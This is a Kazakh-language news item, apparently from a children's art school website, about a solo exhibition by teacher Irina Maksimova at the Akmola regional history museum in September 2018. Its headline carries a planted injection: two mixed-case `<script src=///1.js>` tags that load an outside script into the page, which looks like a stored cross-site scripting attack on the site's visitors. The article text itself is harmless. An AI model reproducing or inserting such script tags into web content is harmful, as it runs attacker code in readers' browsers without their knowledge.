БКМ-НІҢ МҰҒАЛІМІ МАКСИМОВА ИРИНА ВЛАДИМИРОВНАНЫҢ ЖЕКЕ КӨРМЕСІ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.09.2018

    7 қыркүйек күні Ақмола облыстық тарихи-өлкетану мұражайында Максимова Ирина Владимировнаның жеке көрмесі ашылды. Ирина Владимировна Максимованың көркемдік білімі оның кәсіби шеберлігінің негізіне айналды. Ирина Владимировна 1988 жылы Балалар көркемсурет мектебін және 1994 жылы  Көкшетау педагогикалық институтының көркемдік-графикалық бөлімін аяқтады. Ирина Владимировнаның шығармашылық жұмыстары БКМ мұғалімдерінің барлық көрмелерінде және облыстық Суретшілер Одағының мүшелерімен бірлескен көрмелерде көрсетіледі.  2004 жылы  Ақмола облыстық тарихи-өлкетану мұражайының көрме залында алғашқы жеке көрмесі өтті. Бүгінгі таңда, жүре пайда болған тәжірибесі арқасында Ирина Владимировна кескіндеменің түрлі жанрына еркін жүгініп, пейзаждар мен натюрморттарды жасайды, сюжеттік композиция бойынша жұмыс істейді. Пастельмен салынған туындылар оның ерекше дарыны болып саналады.  Көрмеде автордың соңғы 5 жылда орындаған, 34 шығармашылық жұмыстары ұсынылды.

 

Просмотров: 419


Пікір қосу



Деректерді қолтаңбаға қосу